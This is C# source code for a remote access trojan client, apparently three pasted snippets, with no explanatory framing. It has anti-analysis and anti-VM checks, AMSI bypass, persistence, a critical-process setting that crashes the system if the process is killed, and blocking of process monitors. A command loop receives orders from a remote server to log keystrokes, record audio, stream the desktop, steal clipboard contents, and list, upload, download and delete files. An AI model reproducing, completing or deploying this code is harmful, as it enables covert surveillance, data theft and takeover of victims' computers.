public static void Main() { for (int i = 0; i < Convert.ToInt32(Settings.De_lay); i++) { Thread.Sleep(1000); } if (!Settings.InitializeSettings()) { Environment.Exit(0); } try { if (Convert.ToBoolean(Settings.An_ti)) //run anti-virtual environment { Anti_Analysis.RunAntiAnalysis(); } if (!MutexControl.CreateMutex()) //if current payload is a duplicate { Environment.Exit(0); } if (Convert.ToBoolean(Settings.Anti_Process)) //run AntiProcess { AntiProcess.StartBlock(); } if (Convert.ToBoolean(Settings.BS_OD) && Methods.IsAdmin()) //active critical process { ProcessCritical.Set(); } if (Convert.ToBoolean(Settings.In_stall)) //drop payload [persistence] { NormalStartup.Install(); } Methods.PreventSleep(); //prevent pc to idle\sleep if (Methods.IsAdmin()) { Methods.ClearSetting(); } Amsi.Bypass(); } catch { } while (true) // ~ loop to check socket status { try { if (!ClientSocket.IsConnected) { ClientSocket.Reconnect(); ClientSocket.InitializeClient(); } } catch { } Thread.Sleep(5000); } }
//Starts or stops anti-process (task manager, etc.) private void ToggleAntiProcess() { if (!APActive) { APActive = true; AntiProcess.StartBlock(); List <byte> ToSend = new List <byte>(); ToSend.Add((int)DataType.NotificationType); ToSend.AddRange(Encoding.ASCII.GetBytes("Started Anti-Process.")); Networking.MainClient.Send(ToSend.ToArray()); } else if (APActive) { APActive = false; AntiProcess.StopBlock(); List <byte> ToSend = new List <byte>(); ToSend.Add((int)DataType.NotificationType); ToSend.AddRange(Encoding.ASCII.GetBytes("Stopped Anti-Process.")); Networking.MainClient.Send(ToSend.ToArray()); } }
private static void HandleData(byte[] RawData) { if (ReceivingFile) { try { File.WriteAllBytes(FileToWrite, RawData); string Directory = CurrentDirectory; if (Directory.Equals("BaseDirectory")) { Directory = Path.GetPathRoot(Environment.SystemDirectory); } string Files = string.Empty; DirectoryInfo DI = new DirectoryInfo(Directory); foreach (var F in DI.GetDirectories()) { Files += "][{" + F.FullName + "}<" + "Directory" + ">[" + F.CreationTime + "]"; } foreach (FileInfo F in DI.GetFiles()) { Files += "][{" + Path.GetFileNameWithoutExtension(F.FullName) + "}<" + F.Extension + ">[" + F.CreationTime + "]"; } List <byte> ToSend = new List <byte>(); ToSend.Add(5); //File List Type ToSend.AddRange(Encoding.ASCII.GetBytes(Files)); Networking.MainClient.Send(ToSend.ToArray()); ToSend.Clear(); ToSend.Add(1); //Notification Type ToSend.AddRange( Encoding.ASCII.GetBytes("The file " + Path.GetFileName(FileToWrite) + " was uploaded.")); Networking.MainClient.Send(ToSend.ToArray()); } catch { } ReceivingFile = false; return; } string StringForm = string.Empty; try { StringForm = Encoding.ASCII.GetString(RawData); Console.WriteLine("Command Recieved From " + ClientSettings.DNS + " (" + StringForm + ")"); } catch { } if (StringForm == "KillClient") { if (ChatThread.ThreadState == ThreadState.Running) { CloseChatForm(); } UninstallClient(); try { Process.GetCurrentProcess().Kill(); } catch { Environment.Exit(0); } } else if (StringForm == "DisconnectClient") { Networking.MainClient.Disconnect(); } else if (StringForm == "ShowClientConsole") { var handle = GetConsoleWindow(); ShowWindow(handle, SW_SHOW); List <byte> ToSend = new List <byte>(); ToSend.Add(1); //Notification Type ToSend.AddRange(Encoding.ASCII.GetBytes("Console has been shown to client.")); Networking.MainClient.Send(ToSend.ToArray()); } else if (StringForm.Contains("MsgBox")) { string ToBreak = GetSubstringByString("(", ")", StringForm); string Text = GetSubstringByString("<", ">", ToBreak); string Header = GetSubstringByString("[", "]", ToBreak); string ButtonString = GetSubstringByString("{", "}", ToBreak); string IconString = GetSubstringByString("/", @"\", ToBreak); MessageBoxButtons MBB = MessageBoxButtons.OK; MessageBoxIcon MBI = MessageBoxIcon.None; #region Button & Icon conditional statements if (ButtonString.Equals("Abort Retry Ignore")) { MBB = MessageBoxButtons.AbortRetryIgnore; } else if (ButtonString.Equals("OK")) { MBB = MessageBoxButtons.OK; } else if (ButtonString.Equals("OK Cancel")) { MBB = MessageBoxButtons.OKCancel; } else if (ButtonString.Equals("Retry Cancel")) { MBB = MessageBoxButtons.RetryCancel; } else if (ButtonString.Equals("Yes No")) { MBB = MessageBoxButtons.YesNo; } else if (ButtonString.Equals("Yes No Cancel")) { MBB = MessageBoxButtons.YesNoCancel; } if (IconString.Equals("Asterisk")) { MBI = MessageBoxIcon.Asterisk; } else if (IconString.Equals("Error")) { MBI = MessageBoxIcon.Error; } else if (IconString.Equals("Exclamation")) { MBI = MessageBoxIcon.Exclamation; } else if (IconString.Equals("Hand")) { MBI = MessageBoxIcon.Hand; } else if (IconString.Equals("Information")) { MBI = MessageBoxIcon.Information; } else if (IconString.Equals("None")) { MBI = MessageBoxIcon.None; } else if (IconString.Equals("Question")) { MBI = MessageBoxIcon.Question; } else if (IconString.Equals("Stop")) { MBI = MessageBoxIcon.Stop; } else if (IconString.Equals("Warning")) { MBI = MessageBoxIcon.Warning; } #endregion Button & Icon conditional statements MessageBox.Show(Text, Header, MBB, MBI); } else if (StringForm.Equals("StartRD")) { RemoteDesktopStream.Start(); } else if (StringForm.Equals("StopRD")) { RemoteDesktopStream.Stop(); } else if (StringForm.Equals("GetProcesses")) { Process[] PL = Process.GetProcesses(); List <string> ProcessList = new List <string>(); foreach (Process P in PL) { ProcessList.Add("{" + P.ProcessName + "}<" + P.Id + ">[" + P.MainWindowTitle + "]"); } string[] StringArray = ProcessList.ToArray <string>(); List <byte> ToSend = new List <byte>(); ToSend.Add(3); //Process List Type string ListString = ""; foreach (string Process in StringArray) { ListString += "][" + Process; } ToSend.AddRange(Encoding.ASCII.GetBytes(ListString)); Networking.MainClient.Send(ToSend.ToArray()); } else if (StringForm.Contains("EndProcess(")) { string ToEnd = GetSubstringByString("(", ")", StringForm); try { Process P = Process.GetProcessById(Convert.ToInt16(ToEnd)); string Name = P.ProcessName; P.Kill(); List <byte> ToSend = new List <byte>(); ToSend.Add(1); //Notification Type ToSend.AddRange(Encoding.ASCII.GetBytes("The process " + P.ProcessName + " was killed.")); Networking.MainClient.Send(ToSend.ToArray()); } catch { } } else if (StringForm.Contains("OpenWebsite(")) { string ToOpen = GetSubstringByString("(", ")", StringForm); try { Process.Start(ToOpen); } catch { } List <byte> ToSend = new List <byte>(); ToSend.Add(1); //Notification Type ToSend.AddRange(Encoding.ASCII.GetBytes("The website " + ToOpen + " was opened.")); Networking.MainClient.Send(ToSend.ToArray()); } else if (StringForm.Equals("GetComputerInfo")) { string ListString = ""; List <string> ComputerInfoList = new List <string>(); ComputerInfo.GetGeoInfo(); ComputerInfoList.Add("Computer Name: " + ComputerInfo.GetName()); ComputerInfoList.Add("Computer CPU: " + ComputerInfo.GetCPU()); ComputerInfoList.Add("Computer GPU: " + ComputerInfo.GetGPU()); ComputerInfoList.Add("Computer Ram Amount (MB): " + ComputerInfo.GetRamAmount()); ComputerInfoList.Add("Computer Antivirus: " + ComputerInfo.GetAntivirus()); ComputerInfoList.Add("Computer OS: " + ComputerInfo.GetWindowsVersion()); ComputerInfoList.Add("Country: " + ComputerInfo.GeoInfo.Country); ComputerInfoList.Add("Region Name: " + ComputerInfo.GeoInfo.RegionName); ComputerInfoList.Add("City: " + ComputerInfo.GeoInfo.City); foreach (string Info in ComputerInfoList.ToArray()) { ListString += "," + Info; } List <byte> ToSend = new List <byte>(); ToSend.Add(4); //Information Type ToSend.AddRange(Encoding.ASCII.GetBytes(ListString)); Networking.MainClient.Send(ToSend.ToArray()); } else if (StringForm.Equals("RaisePerms")) { Process P = new Process(); P.StartInfo.FileName = ExecutablePath; P.StartInfo.UseShellExecute = true; P.StartInfo.Verb = "runas"; List <byte> ToSend = new List <byte>(); ToSend.Add(1); //Notification Type ToSend.AddRange(Encoding.ASCII.GetBytes("Client is restarting in administration mode.")); P.Start(); Networking.MainClient.Send(ToSend.ToArray()); Environment.Exit(0); } else if (StringForm.Contains("GetDF{")) { try { string Directory = GetSubstringByString("{", "}", StringForm); if (Directory.Equals("BaseDirectory")) { Directory = Path.GetPathRoot(Environment.SystemDirectory); } string Files = string.Empty; DirectoryInfo DI = new DirectoryInfo(Directory); foreach (var F in DI.GetDirectories()) { Files += "][{" + F.FullName + "}<" + "Directory" + ">[" + F.CreationTime + "]"; } foreach (FileInfo F in DI.GetFiles()) { Files += "][{" + Path.GetFileNameWithoutExtension(F.FullName) + "}<" + F.Extension + ">[" + F.CreationTime + "]"; } List <byte> ToSend = new List <byte>(); ToSend.Add(5); //File List Type ToSend.AddRange(Encoding.ASCII.GetBytes(Files)); Networking.MainClient.Send(ToSend.ToArray()); CurrentDirectory = Directory; ToSend.Clear(); ToSend.Add(6); //Current Directory Type ToSend.AddRange(Encoding.ASCII.GetBytes(CurrentDirectory)); Networking.MainClient.Send(ToSend.ToArray()); } catch { } } else if (StringForm.Contains("GoUpDir")) { try { List <byte> ToSend = new List <byte>(); ToSend.Add(7); //Directory Up Type CurrentDirectory = Directory.GetParent(CurrentDirectory).ToString(); ToSend.AddRange(Encoding.ASCII.GetBytes(CurrentDirectory)); Networking.MainClient.Send(ToSend.ToArray()); } catch { } } else if (StringForm.Contains("GetFile")) { try { string FileString = GetSubstringByString("{", "}", StringForm); byte[] FileBytes; using (FileStream FS = new FileStream(FileString, FileMode.Open)) { FileBytes = new byte[FS.Length]; FS.Read(FileBytes, 0, FileBytes.Length); } List <byte> ToSend = new List <byte>(); ToSend.Add(8); //File Type ToSend.AddRange(FileBytes); Networking.MainClient.Send(ToSend.ToArray()); } catch (Exception EX) { List <byte> ToSend = new List <byte>(); ToSend.Add(1); ToSend.AddRange(Encoding.ASCII.GetBytes("Error Downloading: " + EX.Message + ")")); Networking.MainClient.Send(ToSend.ToArray()); } } else if (StringForm.Contains("StartFileReceive{")) { try { FileToWrite = GetSubstringByString("{", "}", StringForm); var Stream = File.Create(FileToWrite); Stream.Close(); ReceivingFile = true; } catch { } } else if (StringForm.Contains("TryOpen{")) { string ToOpen = GetSubstringByString("{", "}", StringForm); try { Process.Start(ToOpen); List <byte> ToSend = new List <byte>(); ToSend.Add(1); //Notification Type ToSend.AddRange(Encoding.ASCII.GetBytes("The file " + Path.GetFileName(ToOpen) + " was opened.")); Networking.MainClient.Send(ToSend.ToArray()); } catch { } } else if (StringForm.Contains("DeleteFile{")) { try { string ToDelete = GetSubstringByString("{", "}", StringForm); File.Delete(ToDelete); List <byte> ToSend = new List <byte>(); ToSend.Add(1); //Notification Type ToSend.AddRange( Encoding.ASCII.GetBytes("The file " + Path.GetFileName(ToDelete) + " was deleted.")); Networking.MainClient.Send(ToSend.ToArray()); string Directory = CurrentDirectory; if (Directory.Equals("BaseDirectory")) { Directory = Path.GetPathRoot(Environment.SystemDirectory); } string Files = string.Empty; DirectoryInfo DI = new DirectoryInfo(Directory); foreach (var F in DI.GetDirectories()) { Files += "][{" + F.FullName + "}<" + "Directory" + ">[" + F.CreationTime + "]"; } foreach (FileInfo F in DI.GetFiles()) { Files += "][{" + Path.GetFileNameWithoutExtension(F.FullName) + "}<" + F.Extension + ">[" + F.CreationTime + "]"; } ToSend.Clear(); ToSend.Add(5); //File List Type ToSend.AddRange(Encoding.ASCII.GetBytes(Files)); Networking.MainClient.Send(ToSend.ToArray()); } catch { } } else if (StringForm.Equals("GetClipboard")) { try { string ClipboardText = "Clipboard is empty or contains an invalid data type."; Thread STAThread = new Thread( delegate() { if (Clipboard.ContainsText(TextDataFormat.Text)) { ClipboardText = Clipboard.GetText(TextDataFormat.Text); } }); STAThread.SetApartmentState(ApartmentState.STA); STAThread.Start(); STAThread.Join(); List <byte> ToSend = new List <byte>(); ToSend.Add(9); //Clipboard Text Type ToSend.AddRange(Encoding.ASCII.GetBytes(ClipboardText)); Networking.MainClient.Send(ToSend.ToArray()); } catch { } } else if (StringForm.Equals("StartUsageStream")) { HardwareUsageStream.Start(); } else if (StringForm.Equals("StopUsageStream")) { HardwareUsageStream.Stop(); } else if (StringForm.Equals("StartKL")) { KeyloggerStream.Start(); } else if (StringForm.Equals("StopKL")) { KeyloggerStream.Stop(); } else if (StringForm.Equals("StartAR")) { if (!ARActive) { RecordAudio(); } } else if (StringForm.Equals("StopAR")) { if (ARActive) { StopRecordAudio(); } } else if (StringForm.Equals("OpenChat")) { if (!CActive) { CActive = true; CI = new ChatInterface(); ChatThread.Start(); } } else if (StringForm.Equals("CloseChat")) { if (CActive) { CActive = false; Networking.ChatClosing = true; Thread.Sleep(200); CloseChatForm(); } } else if (StringForm.Contains("[<MESSAGE>]")) { Networking.CurrentMessage = StringForm.Replace("[<MESSAGE>]", ""); } else if (StringForm.Equals("ToggleAntiProcess")) { if (!APDisabled) { APDisabled = true; AntiProcess.StartBlock(); List <byte> ToSend = new List <byte>(); ToSend.Add(1); //Notification Type ToSend.AddRange(Encoding.ASCII.GetBytes("Started Anti-Process.")); Networking.MainClient.Send(ToSend.ToArray()); } else if (APDisabled) { APDisabled = false; AntiProcess.StopBlock(); List <byte> ToSend = new List <byte>(); ToSend.Add(1); //Notification Type ToSend.AddRange(Encoding.ASCII.GetBytes("Stopped Anti-Process.")); Networking.MainClient.Send(ToSend.ToArray()); } } }